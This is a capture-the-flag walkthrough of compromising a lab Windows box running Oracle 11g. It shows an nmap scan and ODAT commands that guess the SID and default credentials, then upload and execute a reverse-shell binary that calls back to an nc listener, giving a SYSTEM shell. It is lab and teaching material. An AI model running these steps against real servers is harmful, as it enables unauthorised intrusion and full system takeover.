80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2022-01-21T19:57:57
|_ start_date: 2022-01-21T19:45:43
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
We discovered the vulnerability of the box. No we have to search for an existing exploit or tool that we can use for our case. After a while I found the ODAT (Oracle Database Attacking Tool). In the README.md I found a module for our CVE-2012-1675. So let's try this tool.
First we have to clone the repo and change our directory to it:
But we need the server SID. Let's see how we can discover it.
The help menu of odat.py show's us a module sidguesser. I think this is what we need.
$python3odat.pysidguesser-s10.10.10.82[1] (10.10.10.82:1521): Searching valid SIDs[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server[+] 'XE' is a valid SID. Continue... ############################################################################################################### | ETA: 00:00:00
100% |###########################################################################################################| Time: 00:01:30
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)100% |###########################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)[+] 'XE' is a valid SID. Continue... ############################################################################## | ETA: 00:00:08
100% |###########################################################################################################| Time: 00:01:13
[+] SIDs found on the 10.10.10.82:1521 server: XE
And we got our SID: XE
Now we can test again the tnspoison module. I always try to verify the vulnerability before I ran into a rabbit hole.
$python3odat.pytnspoison-s10.10.10.82-dXE--test-modul[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?[+] The target is vulnerable to a remote TNS poisoning
Yes, it works. In the help menu of odat.py I saw the module passwordguesser. Maybe we can extract some credentials. Because we got the SID. This is mostly always required for the modules.
$python3odat.pypasswordguesser-s10.10.10.82-dXE[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521....[+] Accounts found on 10.10.10.82:1521/sid:XE: scott/tiger
Awesome! We found some valid credentials. So maybe we are able to upload our reverse shell. There is a module named utlfile. With this we can upload/download/delete files. But first we have to create our reverse shell.
$python3odat.pyutlfile-s10.10.10.82-dXE-Uscott-Ptiger--sysdba--putFilec:/qwertty.exe../qwertty.exe[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file
Nice, the file was created on the box.
No let's start our nc listener on port 4444
$nc-lvnp4444
Now we can use the module externaltable. It took me a while to discover this module because it is not an obvious name for what we was looking for. But the description says what we want:
to read files or to execute system commands/scripts
Let's try it:
$python3odat.pyexternaltable-s10.10.10.82-dXE-Uscott-Ptiger--sysdba--execc:/qwertty.exe[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path
Hopefully we got the reverse shell. Let's check our nc listener:
$nc-lvnp4444listeningon [any] 4444 ...connectto [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163MicrosoftWindows [Version 6.3.9600](c) 2013 Microsoft Corporation. All rights reserved.C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoamiwhoamintauthority\systemC:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>
Copy
Nice! We got the shell. Now we can grab the user and root flag.